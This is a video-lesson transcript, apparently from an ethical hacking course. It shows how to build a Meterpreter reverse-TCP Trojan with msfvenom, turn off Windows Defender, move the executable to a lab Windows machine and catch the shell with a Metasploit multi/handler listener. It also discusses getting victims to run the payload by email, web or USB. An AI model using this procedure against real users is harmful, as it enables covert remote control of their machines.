1 00:00:00,240 --> 00:00:06,000 OK, it is time we see how we can gain access to the secured systems.
2 00:00:07,090 --> 00:00:12,250 In the previous few videos we talked about and we attacked machines that had some vulnerability inside
3 00:00:12,250 --> 00:00:18,190 of them, whether it was an operating system vulnerability, outdated software or weak credentials,
4 00:00:18,620 --> 00:00:22,910 we managed to exploit them through those vulnerabilities and gain access to them.
5 00:00:23,620 --> 00:00:29,510 But now let's see what happens if our target does not have any known vulnerability.
6 00:00:29,950 --> 00:00:30,910 What now?
7 00:00:31,750 --> 00:00:36,660 Well, remember I told you that the process of attacking is rather the same in this case.
8 00:00:37,210 --> 00:00:44,260 We want to deliver the payload to the target and execute it, just like when the target had a vulnerability.
9 00:00:44,510 --> 00:00:48,370 We did this through an exploit and through that vulnerability.
10 00:00:48,370 --> 00:00:50,890 We managed to execute the payload ourselves.
11 00:00:51,820 --> 00:00:53,800 Now it becomes harder.
12 00:00:54,400 --> 00:01:01,480 We must deliver the payload to the target using some other method, and the target has to execute the
13 00:01:01,480 --> 00:01:02,730 payload themselves.
14 00:01:03,310 --> 00:01:04,570 That is the hard part.
15 00:01:05,260 --> 00:01:11,460 The way you deliver the payload is completely up to you, whether it is over an email, over some HTTP
16 00:01:11,470 --> 00:01:13,400 page or over a USB drive.
17 00:01:13,420 --> 00:01:14,410 It doesn't matter.
18 00:01:15,250 --> 00:01:20,920 What matters is that the payload ends up on their machine and they double click and run it.
19 00:01:21,910 --> 00:01:28,950 For now, let us focus on just creating the payload and running it to see if it works. For this, I will use this Kali
20 00:01:28,960 --> 00:01:34,610 Linux machine to create the payload, and I will execute it on my main Windows 10 machine.
21 00:01:35,290 --> 00:01:40,540 You can run our payloads on the Windows 10 machine that we installed in the previous section, or you
22 00:01:40,540 --> 00:01:42,970 can use any other Windows machine whatsoever.
23 00:01:42,980 --> 00:01:44,760 It doesn't even have to be Windows 10.
24 00:01:45,040 --> 00:01:46,500 It is completely up to you.
25 00:01:47,050 --> 00:01:53,710 Just one thing that we must make sure of is that Windows Defender and antivirus software are turned off.
26 00:01:54,640 --> 00:01:55,030 Why?
27 00:01:55,540 --> 00:02:02,080 Well, we're going to be creating a payload using msfvenom from the Metasploit Framework, and
28 00:02:02,080 --> 00:02:08,200 since many people use the exact same tool to create the exact same payload as we will right now, those
29 00:02:08,200 --> 00:02:13,720 payloads are well known to every antivirus software and they will get detected quickly.
30 00:02:14,350 --> 00:02:19,930 However, for now, our goal is not to bypass antivirus, but to just create a payload and get it to
31 00:02:19,930 --> 00:02:20,290 work.
32 00:02:20,890 --> 00:02:24,590 So turn off your Windows Defender and I will do it right here as well.
33 00:02:24,850 --> 00:02:31,120 You can get to this through the Windows Defender, and the one thing that you want to turn off is under
34 00:02:31,120 --> 00:02:32,950 this Virus & threat protection.
35 00:02:33,250 --> 00:02:38,590 We want to go to the Manage settings and turn off the Real-time protection.
36 00:02:39,280 --> 00:02:44,470 It will ask you for the administrator password and once you type it in, it will turn off the real-time
37 00:02:44,470 --> 00:02:46,780 protection, as it says right here.
38 00:02:47,880 --> 00:02:55,230 So I will close this and now let's create our very first Trojan. As I said, for this we will be using
39 00:02:55,230 --> 00:02:56,940 a tool called msfvenom.
40 00:02:57,720 --> 00:02:59,700 So I'll open a terminal right here.
41 00:03:00,540 --> 00:03:01,680 Why are we using msfvenom?
42 00:03:02,100 --> 00:03:07,740 Well, it is a known tool and it is used to generate payloads really fast in just one command.
43 00:03:08,010 --> 00:03:13,100 We will be able to generate a program that will gain us access to the target system.
44 00:03:13,500 --> 00:03:20,850 So let us see how we can create a simple one first. If I type the command msfvenom -h,
45 00:03:22,000 --> 00:03:29,650 right here, we are going to see our available options with msfvenom, and up here, we also get
46 00:03:29,650 --> 00:03:36,670 examples of usage, which tell us how we can generate a simple payload right here.
47 00:03:37,660 --> 00:03:40,320 Let's follow the example and try it out now.
48 00:03:40,390 --> 00:03:46,810 It tells us right here that to run msfvenom, we need to specify the entire path right here, but
49 00:03:46,810 --> 00:03:54,280 instead we can just specify msfvenom and it will still recognize it as the tool that we need.
50 00:03:54,430 --> 00:04:01,560 And we can write our options right after it. Let me clear the screen so we can see the command better.
51 00:04:01,810 --> 00:04:10,040 And if I go and type msfvenom, we want to use the -p option, and this option stands for payload.
52 00:04:10,060 --> 00:04:13,180 So here we specify which type of payload we are creating.
53 00:04:13,540 --> 00:04:20,290 In my case, since I'm going to be attacking this Windows 10 64-bit machine, I want to generate a windows/
54 00:04:21,760 --> 00:04:24,790 x64/meterpreter/
55 00:04:27,520 --> 00:04:35,740 reverse_tcp payload. I'm using a 64 bit because my machine is a 64 bit machine and I'm using a reverse
56 00:04:35,740 --> 00:04:36,460 shell connection.
57 00:04:37,260 --> 00:04:44,170 Another option that we must specify is the LHOST, and the LHOST is the IP address of your machine.
58 00:04:44,770 --> 00:04:52,120 So we can add to that 168, that one that, well, in my case I will just double check it with ifconfig
59 00:04:52,630 --> 00:04:53,020 test.
60 00:04:53,020 --> 00:04:54,610 One, two, three, four is my password.
61 00:04:54,610 --> 00:04:55,630 And here it is.
62 00:04:55,810 --> 00:04:57,190 The IP address is correct.
63 00:04:59,270 --> 00:05:05,990 Great, another option to specify is the local port, and by the way, this LHOST stands for local host,
64 00:05:05,990 --> 00:05:07,280 not sure if I mentioned it.
65 00:05:07,670 --> 00:05:10,990 And the local port is the port that the target will connect to.
66 00:05:11,120 --> 00:05:13,400 In our case, we can set that to be any port.
67 00:05:13,400 --> 00:05:16,640 That one, for example, let's use the 5555.
68 00:05:17,980 --> 00:05:23,770 After that, we can use the -f option to specify the file type that we want to create.
69 00:05:24,250 --> 00:05:30,390 So since we are attacking a Windows machine in this video, I'm going to be creating an exe file.
70 00:05:30,550 --> 00:05:32,980 So I just type -f and then exe.
71 00:05:33,400 --> 00:05:40,840 And the last option that I want to specify is -o, and this -o stands for output. Here
72 00:05:40,840 --> 00:05:42,250 we specify the name of the file.
73 00:05:42,850 --> 00:05:44,920 I'll just call it shell.exe.
74 00:05:46,420 --> 00:05:48,500 This is all we will specify for now.
75 00:05:48,820 --> 00:05:53,060 So once again, we are creating a 64-bit payload for the Windows target.
76 00:05:53,560 --> 00:05:58,510 We set the local host, which will be written inside the payload so the target can connect to our Kali
77 00:05:58,630 --> 00:05:59,070 machine.
78 00:05:59,290 --> 00:06:03,520 And we also specify the local port to which the target will connect.
79 00:06:04,060 --> 00:06:09,970 After that, we mentioned that the file type will be .exe, which is an executable for Windows, and
80 00:06:09,970 --> 00:06:16,060 at the end we output all of this with the name of shell.exe. Let's press enter.
81 00:06:18,380 --> 00:06:23,810 And here it is, our payload is right here on our Kali desktop.
82 00:06:24,710 --> 00:06:27,350 Here we can see shell.exe.
83 00:06:28,630 --> 00:06:34,360 This program, once executed on the target machine, will grant us access and give us the meterpreter
84 00:06:34,360 --> 00:06:35,880 shell on that machine.
85 00:06:37,040 --> 00:06:41,960 Let's move it real quick to the target machine, and this is something that you can do however you want.
86 00:06:43,340 --> 00:06:50,150 You can plug in the USB device by going in Kali Linux, then on the Devices, then USB and select the USB
87 00:06:50,150 --> 00:06:55,670 device right here, then you will transfer it to the USB device and from the USB device, you will transfer
88 00:06:55,670 --> 00:06:57,620 it to your target Windows machine.
89 00:06:58,550 --> 00:07:00,920 Or you can also go to the Devices.
90 00:07:02,010 --> 00:07:08,310 Click on Drag and Drop and set it to be Bidirectional. This simply means that you can just copy the file
91 00:07:08,850 --> 00:07:14,840 from the Linux desktop and paste it or just drag it to the Windows 10 desktop.
92 00:07:14,850 --> 00:07:18,730 In my case. In case you're using another virtual machine that you're attacking,
93 00:07:18,930 --> 00:07:24,210 you can just copy it first to your main machine desktop and then from the main machine desktop copy it to the
94 00:07:24,210 --> 00:07:25,700 desktop of your virtual machine.
95 00:07:26,070 --> 00:07:28,340 Just make sure that in the target virtual machine
96 00:07:28,350 --> 00:07:31,080 you also set the drag and drop to bidirectional.
97 00:07:32,210 --> 00:07:36,860 Great, now we got our shell.exe, or our payload, on the target machine.
98 00:07:37,610 --> 00:07:39,710 Great, but we are not done yet.
99 00:07:40,100 --> 00:07:45,620 Remember that this shell will attempt to connect to our Kali machine once executed, since it is
100 00:07:45,620 --> 00:07:52,870 a reverse shell, and it will connect on the port 5555. In order for the connection to be established,
101 00:07:52,970 --> 00:07:59,180 we must be listening on that port and have it open in order for the target to even be able to connect back
102 00:07:59,180 --> 00:07:59,670 to us.
103 00:08:00,500 --> 00:08:05,420 This is something that the framework automatically configured for us once we performed our exploitation of
104 00:08:05,420 --> 00:08:06,160 a vulnerability.
105 00:08:06,530 --> 00:08:12,330 But right now we must do it manually, and we can do it with the help of msfconsole as well.
106 00:08:13,040 --> 00:08:17,120 So what I'm going to do is I'm going to start the msfconsole.
107 00:08:19,260 --> 00:08:26,040 And once it opens up, I want to type use exploit/multi/handler.
108 00:08:27,220 --> 00:08:33,010 And this is not an actual exploit, you can imagine this as something that will listen for the incoming
109 00:08:33,010 --> 00:08:34,860 connection from our payload.
110 00:08:35,440 --> 00:08:37,460 It is also called a listener.
111 00:08:38,140 --> 00:08:39,190 So let's set it up.
112 00:08:39,190 --> 00:08:42,610 If I clear the screen to see it better and type show options,
113 00:08:43,460 --> 00:08:46,990 there is only one thing that we need to set, and that is the payload.
114 00:08:47,320 --> 00:08:52,240 So the payload in this bracket must match the payload that the target will execute.
115 00:08:53,210 --> 00:09:05,860 So let's change it: set payload windows/x64/meterpreter/reverse_tcp, and then show options once again,
116 00:09:06,470 --> 00:09:11,350 and we must set the LHOST and LPORT to match those from the msfvenom command.
117 00:09:11,360 --> 00:09:18,410 So set LHOST to be the IP address of my Kali Linux machine, which is not one that 12, and set the LPORT
118 00:09:18,410 --> 00:09:24,440 to be 5555. Once we set up all of these settings, we can run it.
119 00:09:24,470 --> 00:09:25,520 So I just type run.
120 00:09:26,760 --> 00:09:32,290 We can see it is now listening for the connections and nothing else is really happening right here.
121 00:09:32,970 --> 00:09:33,360 Why?
122 00:09:33,750 --> 00:09:38,220 Well, because the shell on the target system hasn't been run yet.
123 00:09:38,610 --> 00:09:40,650 So let's run it on the Windows machine.
124 00:09:43,340 --> 00:09:50,120 And you will see nothing is opening, but if I go back to my Linux machine, here it is, here is our
125 00:09:50,120 --> 00:09:50,660 meterpreter
126 00:09:50,660 --> 00:09:57,050 session opened, and it is identical to the ones that we had during our vulnerability exploitation section.
127 00:09:57,470 --> 00:10:03,440 Just this time, we created and delivered it manually and we also manually set up our listener.
128 00:10:04,350 --> 00:10:10,710 Keep in mind that this didn't exploit any vulnerability, we are just relying on the mistake from the
129 00:10:10,710 --> 00:10:14,420 other person that is using the target machine to execute our file.
130 00:10:15,070 --> 00:10:19,750 Otherwise, if the file doesn't get executed, we don't get access to their machine.
131 00:10:20,370 --> 00:10:26,610 And another thing to keep in mind is that the listener, or in our case, this multi handler that we have,
132 00:10:27,420 --> 00:10:33,570 must be run before the payload, or before this shell.exe, which makes logical sense.
133 00:10:33,570 --> 00:10:39,150 If the target runs our file and we weren't listening for the connection, then they won't be able to
134 00:10:39,150 --> 00:10:40,480 connect to our machine.
135 00:10:41,340 --> 00:10:45,800 You can also notice on the target's desktop, once again, nothing is really happening.
136 00:10:45,990 --> 00:10:51,480 So they might think that the program they executed didn't work and they won't question it that much.
137 00:10:52,570 --> 00:10:58,150 But of course, we got the connection right here and we can use all of the commands that the meterpreter
138 00:10:58,150 --> 00:11:03,250 gives us. We can, as usual, enter a shell, type whoami,
139 00:11:04,000 --> 00:11:07,960 type ipconfig and all the other commands that we can execute.
140 00:11:08,350 --> 00:11:11,550 Type dir to check out all of the available files on the desktop.
141 00:11:12,130 --> 00:11:19,150 And if I exit this, exit out of the shell, since we successfully gained access to it once again.
142 00:11:19,720 --> 00:11:22,960 But keep in mind that, of course, this was just the basic example.
143 00:11:23,080 --> 00:11:29,770 And we will see in the next few videos how to create a little bit more complex payloads. See you in the next
144 00:11:29,770 --> 00:11:30,070 video.